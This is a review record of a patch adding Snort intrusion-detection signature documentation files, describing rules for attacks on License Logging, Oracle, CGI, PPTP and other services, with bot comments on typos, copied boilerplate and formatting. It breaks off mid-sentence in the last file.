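Review bot: grammar and spelling in Impact: "An virus on an infected host may be attempting to propogate." should read "A virus ... propagate." Detailed Information says the rule fires on "a filename extension commonly used by viruses" but never lists the extensions, which is exactly what an analyst needs when deciding whether "A legitimate attachment" caused the event; consider naming them. Additional References is empty and carries two stray blank lines.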
--- /dev/null
+++ b/doc/signatures/3092.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3092
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
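Review bot: a stray blank line sits between "-- " and "Corrective Action: ", breaking the separator-then-heading layout every other section uses. Trailing whitespace on "Rule: ", "Sid: " and several "-- " lines should be stripped. Additional References is empty although the document describes a vendor-patched Microsoft vulnerability; 2937.txt in this patch links the relevant Microsoft Security Bulletin, and the same should be done here.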
--- /dev/null
+++ b/doc/signatures/2885.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2885
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure define_priority_group
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
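Review bot: formatting defect in Detailed Information: "vulnerability in the procedure define_priority_group" is followed by a line consisting of ". This procedure is included in", leaving the period orphaned on its own line; it should read "... the procedure define_priority_group. This procedure is included in sys.dbms_repcat_conf." Affected Systems reads "Oracle Oracle9i", repeating the vendor name. "None Known" under False Positives and False Negatives lacks the period and casing used elsewhere in the patch ("None known.").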
--- /dev/null
+++ b/doc/signatures/2659.txt
@@ -0,0 +1,54 @@
+Rule: 
+
+--
+Sid: 
+2659
+
+-- 
+Summary: 
+This rule is intended to increase the accuracy of rules designed to
+generate events based on attempts to exploit implementations of Secure
+Socket Layer (SSL) version 2.
+
+-- 
+Impact: 
+None. This is a protocol decode rule that does not generate events.
+
+--
+Detailed Information:
+This is a protocol decode rule that does not generate events.
+
+--
+Affected Systems:
+NA
+
+--
+Attack Scenarios: 
+NA
+
+-- 
+Ease of Attack: 
+NA
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+NA
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
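Review bot: protocol name in Summary: "Secure Socket Layer (SSL) version 2" should be "Secure Sockets Layer". Since the document says the rule "does not generate events", it should name the rules whose accuracy it supports, so that an operator who sees it in the ruleset does not disable it as dead weight. Trailing whitespace on "Rule: ", "Sid: " and the "-- " lines.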
--- /dev/null
+++ b/doc/signatures/3104.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3104
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
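Review bot: this document is a verbatim copy of 3092.txt with only the Sid changed to 3104, including the same stray blank line before "Corrective Action: " and the same empty Additional References. If the two rules match different things (for example a different message or transport), Detailed Information should say how they differ; if they are two rules for one flaw, a cross reference to SID 3092 under Additional References would tell the analyst they are related.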
--- /dev/null
+++ b/doc/signatures/522.txt
@@ -0,0 +1,86 @@
+Rule:  
+
+--
+Sid:
+522
+
+--
+Summary:
+This event is generated when an IPv4 fragment of dubiously small nature 
+was detected.
+
+--
+Impact:
+Many IDSes are known to have issues regarding the reassembly of IP
+fragments, and could miss an attack carried over such means.  Firewalls
+suffer from the same issues, and can be tricked into allowing packets
+through that should normally be rejected.  Furthermore, there is a small
+history of OS issues related to unorthodox fragmentation.
+
+--
+Detailed Information:
+IPv4 manages to adapt to various link layer protocols on a route via the
+fragmentation mechanism outlined in its RFC.  A router connecting two
+carrying media of varying MTU (Maximum Transmission Unit) can fragment
+packets of size too large to transmit on one wire before dispatch.  When
+datagrams stay within one MTU, the maximum packet sizes possible can be
+used without fragmentation, thus pairing flexibility with efficiency.
+
+Historically, handling of fragmentation has been less than stellar in
+both IP stacks and the IDS systems designed to protect them.  While the
+limited number of attacks based on fragmentation are easily picked up by
+anomaly- or signature-based system, IDSes which fail to properly
+reassemble fragments can miss any attack which is so fragmented.
+Firewalls have often proved susceptible to fragmented TCP or UDP
+headers, allowing traffic which should have been filtered to pass
+through.
+
+--
+Affected Systems:
+Any IDS/firewall lacking proper IPv4 fragment reassembly.
+
+--
+Attack Scenarios:
+An attacker may pass a fragment containing a TCP/UDP header which is
+allowed to pass through a firewall, then follow this up with a fragment
+which overwrites the previous headers, but is allowed due to poor
+connection tracking.
+
+An attacker may fragment an exploit, so that it is not detected by IPS
+nor filtered by IPS products.
+
+--
+Ease of Attack:
+Tools have been written to trivially fragment traffic; Dug Song's
+fragrouter program is a well-known example.
+
+--
+False Positives:
+It is unlikely that such a fragment would be seen in standard use of
+IPv4; while the last fragment in a series is typically smaller than the
+others, this signature explicilty matches the More Fragments bit.
+Nonetheless, a pedantic reading of the IPv4 RFC allows this, so long as
+the data length is a multiple of 8.
+
+--
+False Negatives:
+Attacks may still be fragmented into larger chunks.
+
+--
+Corrective Action:
+None
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Nick Black, Reflex Security <dank@reflexsecurity.com>
+
+-- 
+Additional References:
+
+IPv4 RFC:
+http://www.faqs.org/rfcs/rfc791.html
+
+--
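Review bot: likely wrong acronym in Attack Scenarios: "so that it is not detected by IPS nor filtered by IPS products" should presumably read "detected by IDS nor filtered by IPS products", matching the Impact section, which treats IDSes and firewalls separately. Typo in False Positives: "explicilty" should be "explicitly". Corrective Action reads "None", but Affected Systems names "Any IDS/firewall lacking proper IPv4 fragment reassembly", so the corrective action is to verify that the IDS and firewall reassemble fragments before inspecting or filtering. Trailing whitespace on "Rule:  ".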
--- /dev/null
+++ b/doc/signatures/878.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+878
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
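Review bot: the document never names the CGI script the rule matches; Summary and Detailed Information are generic ("a CGI web application"), so an analyst cannot tell what triggered the event or check whether that script is installed on the host. Typo in Detailed Information: "running ona web server" should be "on a". "attackers choosing" should be "attacker's choosing" in both Impact and Detailed Information. Additional References is empty although Ease of Attack states "Exploits exist.", so a vulnerability database reference should be cited.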
--- /dev/null
+++ b/doc/signatures/100000625.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000625
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "message_delete.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"message_delete.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
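Review bot: the third paragraph of Detailed Information ("This event is generated when an attempt is made to gain unauthorized access to a CGI application ... validating the credentials of a client host") is credential-check boilerplate that does not describe a remote file include via "admin_template_path" and contradicts the first paragraph's description of the event; drop it or replace it with RFI-specific text. Summary has the redundant "an exploitation attempt has been attempted". Typo "running ona web server". Blank lines are missing before "--" after "100000625", after "All systems running CGI applications using Indexu" and after the Contributors, unlike the other documents. Trailing whitespace on most wrapped lines and a stray blank line at end of file.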
--- /dev/null
+++ b/doc/signatures/2898.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2898
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_unique_resolution
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
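Review bot: same orphaned-period defect as in 2885.txt: "vulnerability in the procedure drop_unique_resolution" is followed by a line beginning ". This procedure is included in"; the period belongs on the procedure-name line. "Oracle Oracle9i" in Affected Systems repeats the vendor name. The body is otherwise identical to 2885.txt apart from the procedure name; since both concern the same package (sys.dbms_repcat_conf), a cross reference between the related SIDs under Additional References would help triage.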
--- /dev/null
+++ b/doc/signatures/2387.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2387
+
+--
+Summary:
+This event is generated when an attempt is made to view a URL with the string "view_broadcast.cgi" in the name.
+
+--
+Impact:
+Denial of service.
+
+--
+Detailed Information:
+A vulnerabilities exists in Apple Quick Time Streaming Server and
+Apple Darwin Streaming Server running on Windows hosts, that may allow
+a denial of service to occur.  This happens when expected parameters are not 
+supplied to this script, causing the server to fail to accept new connections.
+
+--
+Affected Systems:
+QuickTime/Darwin Streaming Server 4.1.3e and earlier on Windows
+
+--
+Attack Scenarios:
+An attacker can craft a packet that contains a URL with the location of the view_broadcast.cgi script and not pass it required parameters.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate patches for the systems affected.
+
+Upgrade to the latest non affected versions of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak<judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/8257
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0422
+
+--
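Review bot: grammar in Detailed Information: "A vulnerabilities exists" should be "A vulnerability exists". Product naming is inconsistent: "Apple Quick Time Streaming Server" in Detailed Information versus "QuickTime/Darwin Streaming Server" in Affected Systems; use "QuickTime". Missing space in Contributors: "Judy Novak<judy.novak@sourcefire.com>". The Summary says the rule matches any URL containing "view_broadcast.cgi", but False Positives is "None Known"; a legitimate request to that script contains the same string, so the False Positives section should say so unless the rule also checks for the missing parameters.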
--- /dev/null
+++ b/doc/signatures/100000370.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000370
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpNuke" application running on a webserver. Access to the file "admin_groups.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "admin_groups.php" script used by the "phpNuke" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpNuke
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
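Review bot: two leading blank lines before "Rule:" and a trailing blank line at end of file, unlike most documents in the patch. The third paragraph of Detailed Information (credential-validation boilerplate) does not describe a remote file include through "phpbb_root_path" and should be removed. Typo "running ona web server"; "an exploitation attempt has been attempted" is redundant; "attackers choosing" should be "attacker's". The long lines are not wrapped at the width the other documents use.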
--- /dev/null
+++ b/doc/signatures/100000637.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000637
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "template_duplicate.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"template_duplicate.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
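Review bot: same issues as 100000625.txt, which this document duplicates apart from the script name: the credential-check paragraph in Detailed Information does not apply to a remote file include via "admin_template_path" in "template_duplicate.php"; "running ona web server"; "an exploitation attempt has been attempted"; missing blank lines before "--" after the Sid, after Affected Systems and after Contributors; trailing whitespace on wrapped lines and a stray blank line at end of file.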
--- /dev/null
+++ b/doc/signatures/2023.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2023
+
+--
+Summary:
+The RPC service mountd enables clients to connect to networked file 
+machine being dismounted via UDP.
+
+--
+Impact:
+Denial of network resources to users on the local area network.
+
+--
+Detailed Information:
+This may be an attempt to deny access to network resources from an 
+unauthorized source. It may also be indicative of an attacker probing 
+for RPC services on a host in an attempt to discover a possible entry 
+point to network resources via a vulnerable daemon.
+
+--
+Affected Systems:
+All systems allowing network shares to be unmounted by anonymous hosts, 
+all systems allowing RPC services to be stopped by ordinary users and 
+systems already compromised by an attacker via another vulnerability.
+
+--
+Attack Scenarios:
+This is an intelligence gathering activity, the attacker could remotely 
+unmount a shared resource to deny a resource to the local area network 
+or a probe to discover possible routes of entry into a system.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+When allowing hosts to mount an external network share, consider using a
+hosts.allow file.
+
+Do not allow shares to be unmounted by unauthorized hosts or users.
+
+RPC services should not be available outside the local area network, 
+filter RPC ports at the firewall to ensure access is denied to RPC 
+enabled machines.
+
+RPC services should also be disabled where not needed.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
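Review bot: the Summary is a broken sentence: "The RPC service mountd enables clients to connect to networked file machine being dismounted via UDP." does not say what the event is. From Detailed Information and Corrective Action it appears to be an RPC mountd unmount request received over UDP, so the Summary should state that in the "This event is generated when ..." form used elsewhere in the patch. Comma splice in Attack Scenarios: "This is an intelligence gathering activity, the attacker could ..." should be two sentences.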
--- /dev/null
+++ b/doc/signatures/2451.txt
@@ -0,0 +1,52 @@
+Rule:
+
+--
+Sid:
+2451
+
+--
+Summary:
+This event is generated when a user in your network has successfully registered with a Yahoo Instant Messenger server to receive voice chat messages or is receiving voice chat messages.
+
+--
+Impact:
+Possible policy violation.  Instant Messenger programs may not be appropriate in certain network environments.
+
+--
+Detailed Information:
+Yahoo IM voice chat allows IM users to exchange audio messages.  This activity may not be appropriate in a corporate environment.
+
+--
+Affected Systems:
+Any host running Yahoo Instant Messenger.
+
+--
+Attack Scenarios:
+This particular type of Yahoo IM exchange has no known attacks, however it may represent a policy violation because the host is running Yahoo IM.
+
+--
+Ease of Attack:
+Easy to exchange voice messages.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+It may be possible for Yahoo IM traffic to use other ports than the default expected ones.  
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+--
+Additional References:
+Yahoo Protocol
+http://www.cse.iitb.ac.in/~varunk/YahooProtocol.htm
+
+--
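Review bot: missing blank line between "Judy Novak <judy.novak@sourcefire.com>" and the "--" separator, unlike the other sections. "Ease of Attack: Easy to exchange voice messages." does not fit a policy rule with no known attacks; 2659.txt uses "NA" where the field does not apply. False Negatives says Yahoo IM "may use other ports than the default expected ones"; naming the ports the rule watches would let an operator extend it.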
--- /dev/null
+++ b/doc/signatures/1342.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid:
+1341
+
+--
+Summary:
+Attempted gcc command access via web
+
+--
+Impact:
+Attempt to compile a binary on a host.
+
+--
+Detailed Information:
+This is an attempt to compiile a C or C++ source on a host. The gcc command is the GNU project's C and C++ compiler used to compile C and C++ source files into executable binary files. The attacker could possibly compile a program needed for other attacks on the system or install a binary program of his choosing.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains 'gcc'in the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. This command may also be requested on a command line should the attacker gain access to the machine. Whenever possible, sensitive files and certain areas of the filesystem should have the system immutable flag set to prevent files from being added to the host. On BSD derived systems, setting the systems runtime securelevel also prevents the securelevel from being changed. (note: the securelevel can only be increased).
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1342
+sid: 1343
+sid: 1344
+sid: 1345
+sid: 1346
+sid: 1347
+sid: 1348
+
+--
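Review bot: the Sid does not match the file: the document is doc/signatures/1342.txt but the Sid section reads "1341", and Additional References lists "sid: 1342" among the related rules, so either the Sid line or the file name is wrong. The document has no Affected Systems section, which every other document in the patch carries. Typos: "compiile" should be "compile", "'gcc'in the URI" is missing a space, and "outside of it's designated web root" should be "its". The last sentence of Corrective Action is circular ("setting the systems runtime securelevel also prevents the securelevel from being changed"); it presumably means that a raised securelevel prevents the immutable flag from being cleared, and the parenthetical "(note: the securelevel can only be increased)" should end with a period.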
--- /dev/null
+++ b/doc/signatures/100000787.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000787
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "ATutor" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "submit" parameter in the "fix_content.php" script used by the "ATutor" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using ATutor
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
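Review bot: Impact and the second paragraph of Detailed Information overstate a cross site scripting issue: "Possible unauthorized administrative access to the server" and "execute system binaries or malicious code" are copied from the remote-file-include documents, while Attack Scenarios describes the actual risk ("a malicious link designed to steal information from a user clicking on that link"). Impact should describe client-side consequences (session or credential theft, actions performed in the victim's browser) rather than server compromise. Two leading blank lines before "Rule:", missing blank lines before "--" after the Sid, after Affected Systems and after Contributors, and a trailing blank line at end of file.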
--- /dev/null
+++ b/doc/signatures/1406.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1406
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
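Review bot: same generic text as 878.txt: the document does not name the CGI script or application the rule matches, so Summary and Detailed Information give an analyst nothing to verify against the host. Typo "running ona web server"; "attackers choosing" should be "attacker's". Additional References is empty although Ease of Attack states "Exploits exist.", so at least a vulnerability database reference should be cited.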
--- /dev/null
+++ b/doc/signatures/2126.txt
@@ -0,0 +1,129 @@
+Rule:
+
+--
+
+Sid:
+2126
+
+--
+
+Summary:
+This event is generated when a remote attacker attempts to overflow Microsoft's
+PPTP RAS service.  
+
+--
+
+Impact:
+Administrative Compromise.  This attack may permit executation of arbitrary
+commands with the privileges of the NT SYSTEM account.
+
+--
+
+Detailed Information:
+A buffer overflow exists when a malformed SCR (Start Control Request) PPTP 
+packet is received by the PPTP RAS service.  This may permit executation of
+arbitrary commands with the privileges of root. 
+
+--
+Affected Systems:
+Windows 2000 Professional
+Windows 2000 Server
+Windows 2000 Advanced Server
+
+--
+
+Attack Scenarios:
+Exploit code can be used to attack vulnerable PPTP RAS services to obtain
